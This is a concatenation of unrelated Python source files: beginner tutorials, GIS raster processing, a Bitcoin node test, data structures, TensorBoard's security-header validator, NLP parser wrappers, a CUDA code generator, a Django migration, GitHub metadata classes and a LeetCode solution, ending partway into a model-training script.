t2 = ('a', 'b', ['A', 'B'])
# print(t2[2])
t2[2][0] = 'X'
t2[2][1] = 'Y'
print(t2)
# 条件判断
age = 3
if age >= 18:
print('adult')
elif age >= 6:
print('teenager')
else:
print('kid')
# s = input('birth: ')
# birth = int(s)
# if birth < 2000:
# print('00前')
# else:
# print('00后')
# 循环
# for
names = ['Michael', 'Bob', 'Tracy']
for name in names:
print(name)
sum = 0
for x in range(0, 101):
sum = sum + x
print(sum)
# while
sum = 0
n = 99
while n > 0:
sum = sum + n
n = n - 2
print(sum)
# break
n = 1
while n <= 100:
if n > 10:
break
print(n)
n = n + 1
print('END')
# continue
n = 0
while n < 10:
n = n + 1
if n % 2 == 0: # 如果n是偶数,执行continue语句
continue # continue语句会直接继续下一轮循环,后续的print()语句不会执行
print(n)
# dict
# set
# s = set([1, 2, 3])
s = set([1, 1, 2, 2, 3, 3]) # 在set中,没有重复的key。
print(s)
""" set可以看成数学意义上的无序和无重复元素的集合,因此,两个set可以做数学意义上的交集、并集等操作: """
s1 = set([1, 2, 3])
s2 = set([2, 3, 4])
print(s1 & s2)
print(s1 | s2)
# 练习Practice
L = [['Apple', 'Google', 'Microsoft'], ['Java', 'Python', 'Ruby', 'PHP'],
['Adam', 'Bart', 'Lisa']]
print(L[0][0])
print(L[1][1])
print(L[2][2])
|
"""Helper functions to be used in views.py/routes file"""
import networkx as nx
import matplotlib
matplotlib.use('Agg')
# for basic network visualizing
import matplotlib.pyplot as plt
# createdb -E UTF8 -T template0 --locale=en_US.utf8 barternet
# specifying system path for module import
import sys
sys.path.append('..')
def add_node(Z, u_id, name):
"""Adding nodes to a graph object in networkx"""
Z.add_node(u_id,{'name':name})
def add_edges(skill_to, skill_from):
"""Adding edges to a graph object in networkx"""
for x, name_s in skill_from:
Z.add_edges_from([(x.user_id, y.user_id, {'name': name_s})for y in skill_to if x.skill_id == y.skill_id])
|
# Author: Pia Feiel
# Date: 21/01/22
# Topic: assign 0 to nodata values & reclassify (8 classes)
#IMPORTE
import os, sys, cfg_sapi, cmd_sapi, saga_api
import numpy as np
#from qgis.utils import iface
from osgeo import gdal
import osgeo.gdal
import math
import os
import numpy as np
#import ogr
import glob
from PyQt5 import QtGui
cmd_sapi.Initialize(True) #"Number of loaded libraries" wird geprintet
####################################---IN1---########################################
EKIN = saga_api.SG_Get_Data_Manager().Add_Grid("data/anriss2_klblock.asc")
#Metadaten
Cellsize = EKIN.Get_Cellsize()
LLX = EKIN.Get_XMin() #lower left corner x-Koordinate
LLY = EKIN.Get_YMin() #lower left corner y-Koordinate
NX= EKIN.Get_NX() #Anzahl an x-Pixel -> definiert die Größe des numpy Arrays
NY= EKIN.Get_NY() #Anzahl an y-Pixel
Nodata= EKIN.Get_NoData_Value()
print(Nodata)
print(NX)
print("Reading Raster...") #nur zur schöneren Ausgabe :)
EKINArray = np.empty((NY,NX)) #erzeugt Numpy Array mit der Größe des Rasters
for gy in range(NY): #Iterator in y: Zeilen durchgehen
for gx in range(NX): #Iterator in x: Spalten durchgehen
zDSM= EKIN.asFloat(gx, gy) #gx, gy sind jeweils die Koordinaten eines Pixels
EKINArray[gy,gx]=zDSM #Variable mit Koordinaten (float-Wert) in den Array schreiben
print(EKINArray)
####################################---NoData---########################################
#this loop writes the max-Value of both raster in a new raster
OutputArray = np.empty((NY,NX))
for gy in range(NY): #Iterator in y: Zeilen durchgehen
for gx in range(NX): #Iterator in x: Spalten durchgehen
if EKINArray[gy,gx] == -9999:
value1 = 0
OutputArray[gy,gx] = value1
else:
value2 = EKINArray[gy,gx]
OutputArray[gy,gx] = value2
print(OutputArray)
####################################---classify---########################################
for j in range(NY):
for i in range(NX):
if OutputArray[i,j] < 1500:
OutputArray[i,j] = 1
elif 1500 < OutputArray[i,j] < 3000:
OutputArray[i,j] = 2
elif 3000 < OutputArray[i,j] < 5000:
OutputArray[i,j] = 3
elif 5000 < OutputArray[i,j] < 10000:
OutputArray[i,j] = 4
elif 10000 < OutputArray[i,j] < 30000:
OutputArray[i,j] = 5
elif 30000 < OutputArray[i,j] < 50000:
OutputArray[i,j] = 6
elif 50000 < OutputArray[i,j] < 75000:
OutputArray[i,j] = 7
else:
OutputArray[i,j] = 8
####################################---OUT---########################################
Out = saga_api.SG_Create_Grid(saga_api.SG_DATATYPE_Float,NX,NY,Cellsize,LLX,LLY,False)
Out.Assign_NoData()
print("Writing Raster...")
for gy in range(NY):
for gx in range(NX):
z = OutputArray[gy,gx] #HIER den gewünschten Output-Array angeben!
Out.Set_Value(gx,gy,z)
Out.Set_Name(saga_api.CSG_String("rammsenergy1_nodata"))
Out.Save("output/rammsenergy1.sgrd") #in den Data-Ordner schreiben
print("done")
|
#!/usr/bin/env python3
from test_framework.test_framework import BitcoinTestFramework
from test_framework.messages import (
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
ToHex,
FromHex)
from test_framework.script import (
CScript,
hash160,
OP_EQUAL,
OP_HASH160,
OP_TRUE,
)
from test_framework.validaterawtransaction import check_validaterawtx
from test_framework.util import sync_mempools
# Copied from abc-segwit-recovery-activation
# Returns 2 transactions:
# 1) txfund: create outputs in segwit addresses
# 2) txspend: spends outputs from segwit addresses
def create_segwit_fund_and_spend_tx(node, spend, case0=False):
if not case0:
# To make sure we'll be able to recover coins sent to segwit addresses,
# we test using historical recoveries from btc.com:
# Spending from a P2SH-P2WPKH coin,
# txhash:a45698363249312f8d3d93676aa714be59b0bd758e62fa054fb1ea6218480691
redeem_script0 = bytearray.fromhex(
'0014fcf9969ce1c98a135ed293719721fb69f0b686cb')
# Spending from a P2SH-P2WSH coin,
# txhash:6b536caf727ccd02c395a1d00b752098ec96e8ec46c96bee8582be6b5060fa2f
redeem_script1 = bytearray.fromhex(
'0020fc8b08ed636cb23afcb425ff260b3abd03380a2333b54cfa5d51ac52d803baf4')
else:
redeem_script0 = bytearray.fromhex('51020000')
redeem_script1 = bytearray.fromhex('53020080')
redeem_scripts = [redeem_script0, redeem_script1]
# Fund transaction to segwit addresses
txfund = CTransaction()
txfund.vin = [CTxIn(COutPoint(int(spend['txid'], 16), spend['vout']))]
amount = (50 * COIN - 1000) // len(redeem_scripts)
for redeem_script in redeem_scripts:
txfund.vout.append(
CTxOut(amount, CScript([OP_HASH160, hash160(redeem_script), OP_EQUAL])))
txfund = FromHex(CTransaction(), node.signrawtransactionwithwallet(ToHex(txfund))["hex"])
txfund.rehash()
# Segwit spending transaction
# We'll test if a node that checks for standardness accepts this
# txn. It should fail exclusively because of the restriction in
# the scriptSig (non clean stack..), so all other characteristcs
# must pass standardness checks. For this reason, we create
# standard P2SH outputs.
txspend = CTransaction()
for i in range(len(redeem_scripts)):
txspend.vin.append(
CTxIn(COutPoint(txfund.sha256, i), CScript([redeem_scripts[i]])))
txspend.vout = [CTxOut(50 * COIN - 2000,
CScript([OP_HASH160, hash160(CScript([OP_TRUE])), OP_EQUAL]))]
txspend.rehash()
return txfund, txspend
class ValidateRawSegwitTransactionTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [
["-acceptnonstdtxn=1"],
["-acceptnonstdtxn=0"]]
def run_test(self):
self.log.info("Test started");
node_accepting_nonstandard = self.nodes[0]
node_rejecting_nonstandard = self.nodes[1]
n = node_rejecting_nonstandard
n.generate(105)
out = n.listunspent()
txfund, txspend = create_segwit_fund_and_spend_tx(n, out.pop())
txfund_case0, txspend_case0 = create_segwit_fund_and_spend_tx(n, out.pop(), True)
# Funding transaction standard complient and is accepted by both nodes
for tx in [txfund, txfund_case0]:
check_validaterawtx(node_rejecting_nonstandard,
tx, num_errors = 0)
check_validaterawtx(node_accepting_nonstandard,
tx, num_errors = 0)
n.sendrawtransaction(ToHex(txfund))
n.sendrawtransaction(ToHex(txfund_case0))
sync_mempools(self.nodes)
# Recovery transaction is non-standard
for tx in [txspend, txspend_case0]:
check_validaterawtx(node_rejecting_nonstandard,
tx,
is_minable = False,
has_valid_inputs = False,
num_errors = len(["input-script-failed"]))
# # Upstream has changed to a weird policy for segwit transactions,
# # they are no longer accepted to mempool, even though they are
# # valid non-standard transactions.
# check_validaterawtx(node_accepting_nonstandard,
# tx, num_errors = 0)
#
# node_accepting_nonstandard.sendrawtransaction(ToHex(txspend))
# node_accepting_nonstandard.sendrawtransaction(ToHex(txspend_case0))
check_validaterawtx(node_accepting_nonstandard,
tx,
is_minable = False,
has_valid_inputs = False,
num_errors = len(["input-script-failed"]))
if __name__ == '__main__':
ValidateRawSegwitTransactionTest().main()
|
"""
entradas
capitalparaprestamo-->c-->float
tasadeinteres-->t-->float
salidas
porcentajeanualdecobro-->i-->float
"""
#entradas
c=float(input("Ingrese el capital "))
t=float(input("Ingrese la tasa de interes "))
#caja negra
i=(t*100)/(c*4)
#salidas
print("El porcentaje anual de cobro por el prestamo de ",c, " sera de ",i, "%")
|
from typing import Any, List
from dataclasses import dataclass, field
from PyDS.Error import Empty
@dataclass
class Queue:
"""Implementation of Queue ADT
:param __capacity: The maximum number of elements a queue can hold
:type __capacity: int
:param __list: A container that holds n-elements in queue
:type __list: list[Any]
:param __front: The index pointing at front of queue
:type __front: int
:param __size: The size of the queue
:type __size: int
"""
__capacity: int = 64
__list: List[Any] = field(default_factory=lambda: [None] * Queue.__capacity)
__front: int = 0
__size: int = 0
def enqueue(self, value: Any) -> None:
"""Insertion to the tail of the queue
:param value: The value inserting to the tail
:type value: Any
"""
if self.__size == self.__capacity:
self.__resize(capacity=2 * self.__capacity)
end = (self.__front + self.__size) % self.__capacity
self.__list[end] = value
self.__size += 1
def dequeue(self) -> Any:
"""Deletion at the front of the queue
:return: A value at the front of queue
:rtype: Any
"""
if self.is_empty():
raise Empty("Queue is empty")
if 0 < self.__size < (self.__capacity // 4):
self.__resize(capacity=self.__capacity // 2)
value = self.__list[self.__front]
self.__list[self.__front] = None
self.__front = (self.__front + 1) % self.__capacity
self.__size -= 1
return value
def front(self) -> Any:
"""Gets value at front of queue
:return: A value at the front of queue
:rtype: Any
"""
if self.is_empty():
raise Empty("Queue is empty")
return self.__list[self.__front]
def is_empty(self) -> bool:
"""Checks to see if queue is empty
:return: Whether or not the queue's empty
:rtype: bool
"""
return self.__size == 0
def __resize(self, capacity: int) -> None:
"""Resize queue with twice the capacity"""
list_ = [None] * capacity
front = self.__front
for i in range(self.__size):
list_[i] = self.__list[front]
front = (front + 1) % self.__capacity
self.__front = 0
self.__list = list_
self.__capacity = capacity
def __len__(self) -> int:
return self.__size
def __str__(self) -> str:
if self.is_empty():
return 'Queue([])'
front = self.__front
output = 'Queue(['
for _ in range(self.__size - 1):
output += f'{self.__list[front]}, '
front = (front + 1) % self.__capacity
output += f'{self.__list[front]}])'
return output
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Validates responses and their security features."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from werkzeug.datastructures import Headers
from werkzeug import http
from tensorboard.util import tb_logging
# Loosely follow vocabulary from https://www.w3.org/TR/CSP/#framework-directives.
Directive = collections.namedtuple("Directive", ["name", "value"])
logger = tb_logging.get_logger()
_HTML_MIME_TYPE = "text/html"
_CSP_DEFAULT_SRC = "default-src"
# Whitelist of allowed CSP violations.
_CSP_IGNORE = {
# Allow TensorBoard to be iframed.
"frame-ancestors": ["*"],
# Polymer-based code uses unsafe-inline.
"style-src": ["'unsafe-inline'", "data:"],
# Used in canvas
"img-src": ["blob:", "data:"],
# Used by numericjs.
# TODO(stephanwlee): remove it eventually.
"script-src": ["'unsafe-eval'"],
}
def _maybe_raise_value_error(error_msg):
logger.warning("In 3.0, this warning will become an error:\n%s" % error_msg)
# TODO(3.x): raise a value error.
class SecurityValidatorMiddleware(object):
"""WSGI middleware validating security on response.
It validates:
- responses have Content-Type
- responses have X-Content-Type-Options: nosniff
- text/html responses have CSP header. It also validates whether the CSP
headers pass basic requirement. e.g., default-src should be present, cannot
use "*" directive, and others. For more complete list, please refer to
_validate_csp_policies.
Instances of this class are WSGI applications (see PEP 3333).
"""
def __init__(self, application):
"""Initializes an `SecurityValidatorMiddleware`.
Args:
application: The WSGI application to wrap (see PEP 3333).
"""
self._application = application
def __call__(self, environ, start_response):
def start_response_proxy(status, headers, exc_info=None):
self._validate_headers(headers)
return start_response(status, headers, exc_info)
return self._application(environ, start_response_proxy)
def _validate_headers(self, headers_list):
headers = Headers(headers_list)
self._validate_content_type(headers)
self._validate_x_content_type_options(headers)
self._validate_csp_headers(headers)
def _validate_content_type(self, headers):
if headers.get("Content-Type"):
return
_maybe_raise_value_error("Content-Type is required on a Response")
def _validate_x_content_type_options(self, headers):
option = headers.get("X-Content-Type-Options")
if option == "nosniff":
return
_maybe_raise_value_error(
'X-Content-Type-Options is required to be "nosniff"'
)
def _validate_csp_headers(self, headers):
mime_type, _ = http.parse_options_header(headers.get("Content-Type"))
if mime_type != _HTML_MIME_TYPE:
return
csp_texts = headers.get_all("Content-Security-Policy")
policies = []
for csp_text in csp_texts:
policies += self._parse_serialized_csp(csp_text)
self._validate_csp_policies(policies)
def _validate_csp_policies(self, policies):
has_default_src = False
violations = []
for directive in policies:
name = directive.name
for value in directive.value:
has_default_src = has_default_src or name == _CSP_DEFAULT_SRC
if value in _CSP_IGNORE.get(name, []):
# There are cases where certain directives are legitimate.
continue
# TensorBoard follows principle of least privilege. However, to make it
# easier to conform to the security policy for plugin authors,
# TensorBoard trusts request and resources originating its server. Also,
# it can selectively trust domains as long as they use https protocol.
# Lastly, it can allow 'none' directive.
# TODO(stephanwlee): allow configuration for whitelist of domains for
# stricter enforcement.
# TODO(stephanwlee): deprecate the sha-based whitelisting.
if (
value == "'self'"
or value == "'none'"
or value.startswith("https:")
or value.startswith("'sha256-")
):
continue
msg = "Illegal Content-Security-Policy for {name}: {value}".format(
name=name, value=value
)
violations.append(msg)
if not has_default_src:
violations.append(
"Requires default-src for Content-Security-Policy"
)
if violations:
_maybe_raise_value_error("\n".join(violations))
def _parse_serialized_csp(self, csp_text):
# See https://www.w3.org/TR/CSP/#parse-serialized-policy.
# Below Steps are based on the algorithm stated in above spec.
# Deviations:
# - it does not warn and ignore duplicative directive (Step 2.5)
# Step 2
csp_srcs = csp_text.split(";")
policy = []
for token in csp_srcs:
# Step 2.1
token = token.strip()
if not token:
# Step 2.2
continue
# Step 2.3
token_frag = token.split(None, 1)
name = token_frag[0]
values = token_frag[1] if len(token_frag) == 2 else ""
# Step 2.4
name = name.lower()
# Step 2.6
value = values.split()
# Step 2.7
directive = Directive(name=name, value=value)
# Step 2.8
policy.append(directive)
return policy
|
#!/usr/bin/env python3
##############################################################################
# Author: Chao XU
# Date: 2019-01-27
# Affiliation: Peking University, TU Dresden
# Function: stanford parser and tagger
##############################################################################
from nltk.parse.corenlp import CoreNLPParser
from nltk.tag import StanfordPOSTagger
import os
from nltk.tree import Tree
def get_postagger_for_criterion(criterion):
#ini_path = "/stanford/postagger"
#os.environ['STANFORD_PARSER'] = ini_path
#os.environ['STANFORD_MODELS'] = ini_path
#os.environ['CLASSPATH'] = ini_path
st = CoreNLPParser(url=os.environ['STANFORD_NLP_TOOLS'], tagtype='pos')
postagger_list = st.tag(criterion)
return postagger_list
'''
#Example
criterion = 'Current diagnosis of alcohol dependence'
print(get_postagger_for_criterion(criterion.split()))
#[('Current', 'JJ'), ('diagnosis', 'NN'), ('of', 'IN'), ('alcohol', 'NN'), ('dependence', 'NN')]
'''
def get_parser_tree_from_phrase(phrase):
#ini_path = "/stanford/jars"
#os.environ['STANFORD_PARSER'] = ini_path
#os.environ['STANFORD_MODELS'] = ini_path
'''
parser = stanford.StanfordParser(model_path= ini_path + "/stanford-parser-3.9.2-models/edu/stanford/nlp/models/lexparser/englishPCFG.ser.gz")
parse_generator = parser.raw_parse(phrase)
for line in parse_generator:
parse_tree = line
break
'''
parse_tree = Tree(None, [])
parser = CoreNLPParser(url=os.environ['STANFORD_NLP_TOOLS'])
try:
parse_generator = parser.raw_parse(phrase)
for line in parse_generator:
parse_tree = line
break
except:
print('Something wrong when trying to get parser tree by Stanford Parser!')
return parse_tree
if __name__ == '__main__':
excluded_list = ['CC','DT', 'EX', 'IN', 'MD', 'POS', 'RP', 'WDT', 'WP', 'WP$']
#phrase_tree = get_parser_tree_from_phrase('dental implants')
phrase_tree = get_parser_tree_from_phrase('type 1 diabetes or type 2 diabetes with medication known to induce hypoglycemia (f.e. sulfonylurea derivatives')
print(type(phrase_tree), phrase_tree)
for tree in phrase_tree.subtrees(lambda s: s.height() == 2 or s.height() == 4 and s.label() not in [ 'PP']):
print(' '.join(tree.leaves()))
print(tree.label())
|
from weakref import WeakSet
class UpdateModel(object):
"""Provide the object with a way to notify other objects
that depend on it.
"""
# Slots ensures we're explicit and fast
__slots__ = ('_sources', '_listeners', '_up_to_date',
'_metadata', '_notify_callback',
'__weakref__')
def __init__(self, metadata=None, notify_callback=None, *args, **kwargs):
"""Initialize the chain.
By tracking both sources and listeners, we can make a graph of what
gets updated by what.
The metadata is a bucket for runtime info to be checked during notifications.
"""
# Initialize mixins - NOPE Update is not cooperative.
# It expects to be a base class
#super(UpdateModel, self).__init__(*args, **kwargs)
self._sources = tuple()
self._listeners = WeakSet()
self._metadata = metadata
self._notify_callback = notify_callback
self._up_to_date = True
# Initialize mixins
super(UpdateModel, self).__init__(*args, **kwargs)
@property
def metadata(self):
return self._metadata
def subscribe(self, listener):
"""Add a listener to the subscriber list.
This isn't a set - order will likely help efficiency,
the list will be updated infrequently, and the list
should never get very big anyhow.
Note that Calc objects have a source to act as their publisher list.
(In case we want to backtrace.)
"""
if not listener in self._listeners:
self._listeners.add(listener)
def unsubscribe(self, listener):
"""Remove a listener from the subscriber list.
"""
while listener in self._listeners:
self._listeners.remove(listener)
def notify(self, old_selector, new_selector, source=None, depth=0):
"""Fires an update to make sure dependents are updated, if needed.
The selectors show what happened in the update.
"""
for dependent in self._listeners:
try:
# TODO: verify that for each update, only one update is marshalled and fired
# for example, if an update forces a Composable to clear,
# then we can expect that it'll fire for both the clear _and_ the pass-thru update
if dependent.up_to_date or old_selector:
dependent.update(old_selector, new_selector, source or self, depth+1)
except NotImplementedError:
pass
except AttributeError:
pass
if self._notify_callback:
try:
self._notify_callback(old_selector, new_selector, source or self, depth)
except:
pass # isolate event failures
def update(self, old_selector, new_selector, source=None, depth=0):
"""Execute the update. Each class will have its own way to implement this."""
# (None, None) signals that the data is out of date,
# but there is nothing for dependents to do yet.
self._up_to_date = False
# Pass-through updates without triggering
self.notify(old_selector, new_selector, source or self, depth)
# NOTE: super calls in subclasses should mark up_to_date when they're brought up
@property
def listeners(self):
return self._listeners
@property
def up_to_date(self):
return self._up_to_date
@listeners.setter
def listeners(self, new_listeners):
self._replace_listeners(new_listeners)
def _replace_listeners(self, new_listeners):
"""If the listeners are changed en masse, break
all the subscriptions.
This setter makes sure the subscription methods are never skipped.
"""
while self._listeners:
listener = self._listeners[0]
self.unsubscribe(listener)
for listener in new_listeners:
self.subscribe(listener)
@property
def sources(self):
return self._sources
@sources.setter
def sources(self, new_sources):
self._replace_sources(new_sources)
def _replace_sources(self, new_sources):
for source in set(self._sources).difference(set(new_sources)):
source.unsubscribe(self)
for source in new_sources:
source.subscribe(self)
self._sources = new_sources
|
#
#
#
def tc_gen_code_Kernel_Head(f, kernel_name, l_t3_d_decl_var, l_t2_d_decl_var, l_v2_d_decl_var, l_input_strides, l_external_idx, l_internal_idx, l_inputs_addr,
opt_internal, opt_pre_computed, opt_data_type):
#
f.write("\n")
f.write("// created by tc_gen_code_Kernel()\n")
f.write("__global__ void ")
f.write(kernel_name)
f.write("(")
# parameters for t3 (output)
for t3_var in l_t3_d_decl_var:
if opt_pre_computed == -1:
if "range" in t3_var:
continue
if "base" in t3_var:
continue
if "offset" in t3_var:
continue
#
f.write(t3_var)
f.write(", ")
else:
f.write(t3_var)
f.write(", ")
f.write("\n")
# parameters for t2 (left)
for t2_var in l_t2_d_decl_var:
if opt_pre_computed == -1:
if "addr" in t2_var:
continue
if "offset" in t2_var:
continue
#
f.write(t2_var)
f.write(", ")
else:
f.write(t2_var)
f.write(", ")
f.write("\n")
# parameters for v2 (right)
for v2_var in l_v2_d_decl_var:
if opt_pre_computed == -1:
if "addr" in v2_var:
continue
if "offset" in v2_var:
continue
#
f.write(v2_var)
f.write(", ")
else:
f.write(v2_var)
f.write(", ")
f.write("\n")
#
# [Rules] Sizes: External Indinces and Iternal Indices
# numBlks: Externl Indices
#
if opt_pre_computed == -1:
#
# [Sizes] External
#
for each_idx in l_external_idx:
f.write("int size_" + each_idx + ", ")
#
# [Sizes] Internal
#
for each_idx in l_internal_idx:
f.write("int size_" + each_idx + ", ")
f.write("\n")
#
# [Blks] External
#
for each_idx in l_external_idx:
f.write("int numBlk_" + each_idx + ", ")
f.write("\n")
#
# (Optional) Strides for LEFT and RIGHT (if internal index is not FVI)
# This is for an internal index, because constant-memory will be used for
# multiple-internal index.
#
if len(l_input_strides) > 0:
for each_tc in l_input_strides:
f.write("int " + each_tc[0] + ", ")
f.write("int " + each_tc[2] + ", ")
f.write("\n")
#
# (Optional)
#
if opt_internal > 1:
for each_tensor_contraction in l_inputs_addr:
f.write("int* dev_internal_offset_" + each_tensor_contraction[0][3] + ", ")
f.write("int* dev_internal_offset_" + each_tensor_contraction[1][3] + ", ")
f.write("\n")
#
f.write("int stride_reg_x, ")
f.write("int stride_reg_y, ")
f.write("\n")
# the size of |internal indices| = size_internal
f.write("int size_internal")
f.write(")\n")
#
#
#
def tc_gen_code_Kernel_Head_RT(f, kernel_name, l_combined_t3_d_decl_var, l_combined_t2_d_decl_var, l_combined_v2_d_decl_var):
#
f.write("\n")
f.write("// created by tc_gen_code_kernel_RT()\n")
f.write("__global__ void ")
f.write(kernel_name)
f.write("(")
# T3 (Output)
#
idx_count = 0
for each_inner_group in l_combined_t3_d_decl_var:
for t3_var in each_inner_group:
if idx_count != 0:
idx_count = idx_count - 1 # Need to Get Rid of the Output (Overlapped)
continue
f.write(t3_var)
f.write(", ")
f.write("\n")
idx_count = idx_count + 1
# T2 (LEFT)
for each_inner_group in l_combined_t2_d_decl_var:
for t2_var in each_inner_group:
f.write(t2_var)
f.write(", ")
f.write("\n")
# V2 (RIGHT)
for each_inner_group in l_combined_v2_d_decl_var:
for v2_var in each_inner_group:
f.write(v2_var)
f.write(", ")
f.write("\n")
#
f.write("int stride_reg_x, ")
f.write("int stride_reg_y, ")
#
f.write("int size_internal")
f.write(")\n")
|
# Generated by Django 3.1.6 on 2021-05-12 21:29
from django.db import migrations
def unset_non_page_content_paths(apps, schema_editor):
"""
Blanks 'dirpath' and 'filename' values for all WebsiteContent records that do not represent page content.
The destination filepath for these types of WebsiteContent records comes from the site config, so having non-blank
values for these fields is misleading.
"""
WebsiteContent = apps.get_model("websites", "WebsiteContent")
WebsiteContent.objects.filter(is_page_content=False).update(dirpath="", filename="")
class Migration(migrations.Migration):
dependencies = [
("websites", "0025_update_sync_checksum"),
]
operations = [
migrations.RemoveField(
model_name="websitecontent",
name="content_filepath",
),
migrations.RunPython(unset_non_page_content_paths, migrations.RunPython.noop),
]
|
import os
from waterbutler.core import metadata
class BaseGitHubMetadata(metadata.BaseMetadata):
def __init__(self, raw, folder=None, commit=None):
super().__init__(raw)
self.folder = folder
self.commit = commit
@property
def provider(self):
return 'github'
@property
def extra(self):
ret = {}
if self.commit is not None:
ret['commit'] = self.commit
return ret
def build_path(self, path):
if self.folder:
path = os.path.join(self.folder, path.lstrip('/'))
return super().build_path(path)
class BaseGitHubFileMetadata(BaseGitHubMetadata, metadata.BaseFileMetadata):
def __init__(self, raw, folder=None, commit=None, web_view=None):
super().__init__(raw, folder, commit)
self.web_view = web_view
@property
def path(self):
return self.build_path(self.raw['path'])
@property
def modified(self):
if not self.commit:
return None
return self.commit['author']['date']
@property
def content_type(self):
return None
@property
def etag(self):
return '{}::{}'.format(self.path, self.raw['sha'])
@property
def extra(self):
return dict(super().extra, **{
'fileSha': self.raw['sha'],
'webView': self.web_view
})
class BaseGitHubFolderMetadata(BaseGitHubMetadata, metadata.BaseFolderMetadata):
@property
def path(self):
return self.build_path(self.raw['path'])
class GitHubFileContentMetadata(BaseGitHubFileMetadata):
@property
def name(self):
return self.raw['name']
@property
def size(self):
return self.raw['size']
class GitHubFolderContentMetadata(BaseGitHubFolderMetadata):
@property
def name(self):
return self.raw['name']
class GitHubFileTreeMetadata(BaseGitHubFileMetadata):
@property
def name(self):
return os.path.basename(self.raw['path'])
@property
def size(self):
return self.raw['size']
class GitHubFolderTreeMetadata(BaseGitHubFolderMetadata):
@property
def name(self):
return os.path.basename(self.raw['path'])
# TODO dates!
class GitHubRevision(metadata.BaseFileRevisionMetadata):
@property
def version_identifier(self):
return 'ref'
@property
def modified(self):
return self.raw['commit']['author']['date']
@property
def version(self):
return self.raw['sha']
@property
def extra(self):
return {
'user': {
'name': self.raw['commit']['committer']['name']
}
}
|
#
# @lc app=leetcode id=212 lang=python3
#
# [212] Word Search II
#
# https://leetcode.com/problems/word-search-ii/description/
#
# algorithms
# Hard (37.77%)
# Likes: 3927
# Dislikes: 147
# Total Accepted: 314.4K
# Total Submissions: 831.8K
# Testcase Example: '[["o","a","a","n"],["e","t","a","e"],["i","h","k","r"],["i","f","l","v"]]\n' +
# '["oath","pea","eat","rain"]'
#
# Given an m x n board of characters and a list of strings words, return all
# words on the board.
#
# Each word must be constructed from letters of sequentially adjacent cells,
# where adjacent cells are horizontally or vertically neighboring. The same
# letter cell may not be used more than once in a word.
#
#
# Example 1:
#
#
# Input: board =
# [["o","a","a","n"],["e","t","a","e"],["i","h","k","r"],["i","f","l","v"]],
# words = ["oath","pea","eat","rain"]
# Output: ["eat","oath"]
#
#
# Example 2:
#
#
# Input: board = [["a","b"],["c","d"]], words = ["abcb"]
# Output: []
#
#
#
# Constraints:
#
#
# m == board.length
# n == board[i].length
# 1 <= m, n <= 12
# board[i][j] is a lowercase English letter.
# 1 <= words.length <= 3 * 10^4
# 1 <= words[i].length <= 10
# words[i] consists of lowercase English letters.
# All the strings of words are unique.
#
#
#
from typing import List
# @lc code=start
"""
Time: 8.6s (18%)
Memory: 14.6 MB (40%)
"""
class Solution:
def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:
height = len(board)
if height == 0:
return []
width = len(board[0])
# construct char to pos
char2pos = {}
for i in range(height):
for j in range(width):
char = board[i][j]
if char in char2pos:
char2pos[char].append((i,j))
else:
char2pos[char] = [(i,j)]
res = []
marked = {}
for word in words:
for pos in char2pos.get(word[0], [None]):
if pos != None :
marked[pos[0],pos[1]] = True
flag = self.findWord(board, marked,char2pos,pos[0],pos[1],word[1: ])
marked[pos[0],pos[1]] = False
if flag:
res.append(word)
break
return res
def findWord(self, board,marked,char2pos, x,y,word):
if len(word) == 0:
return True
height = len(board)
width = len(board[0])
candidate1 = [
(x-1,y), # up
(x,y-1), # left
(x,y+1), # right
(x+1,y) # down
]
candidate2 = char2pos.get(word[0], None)
marked[x,y] = True
if candidate2 == None:
return False
c1 = set(candidate1)
c2 = set(candidate2)
c = c1.intersection(c2)
for i,j in c:
if marked.get((i,j), False):
continue
# val = board[i][j]
# if val == word[0]:
flag = self.findWord(board,marked,char2pos, i,j,word[1: ])
if flag:
marked[x,y] = False
return True
marked[x,y] = False
return False
# @lc code=end
if __name__ == "__main__":
board = [["o","a","b","n"],["o","t","a","e"],["a","h","k","r"],["a","f","l","v"]]
words = ["oa","oaa",'oao']
# board = [["a","a"]]
# words = ["aaa"]
# board = [["a","b"]]
# words = ["ab"]
so = Solution()
r = so.findWords(board, words)
print(r)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
\ /
\ o ^ o /
\ ( ) /
____________(%%%%%%%)____________
( / / )%%%%%%%( \ \ )
(___/___/__/ \__\___\___)
( / /(%%%%%%%)\ \ )
(__/___/ (%%%%%%%) \___\__)
/( )\
/ (%%%%%) \
(%%%)
!
"""
from dmpnn.models import GraphNetworkLigthning, GraphNetworkEnsembleLightning, ExplainerNetworkLightning
from dmpnn.data import GraphsDataModule
from dmpnn.splits import ScaffoldSplitter
import torch
import numpy
import os
import shutil
import optuna
import argparse
import pandas
import warnings
import logging
import sys
import time
import pytorch_lightning
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.callbacks import EarlyStopping
from typing import Union, Tuple, Optional
__author__ = "Damien Coupry"
__copyright__ = "GSK"
__license__ = "MIT"
__version__ = "0.1.0"
__maintainer__ = "Damien Coupry"
__email__ = "damien.x.coupry@gsk.com"
__status__ = "Dev"
# setting up loggers and seeds
logging.getLogger("lightning").setLevel(logging.ERROR)
logger = logging.getLogger("optuna")
seed_everything(42)
def train_single_model(args: argparse.Namespace,
data: pytorch_lightning.LightningDataModule,
model_dir: str,
pruner: Optional[pytorch_lightning.callbacks.EarlyStopping] = None,
) -> pytorch_lightning.LightningModule:
steps_per_epoch = int(data.get_train_len() / args.batch_size)
epochs_per_cycle = int(args.lr_cycle_size / steps_per_epoch)
early_stopping = EarlyStopping(monitor="val_loss", min_delta=1e-3, patience=epochs_per_cycle + 1)
callbacks = [early_stopping, ]
if pruner is not None:
callbacks += [pruner, ]
model = GraphNetworkLigthning(hparams=args)
trainer = Trainer.from_argparse_args(args,
auto_select_gpus=True,
max_epochs=args.max_epochs,
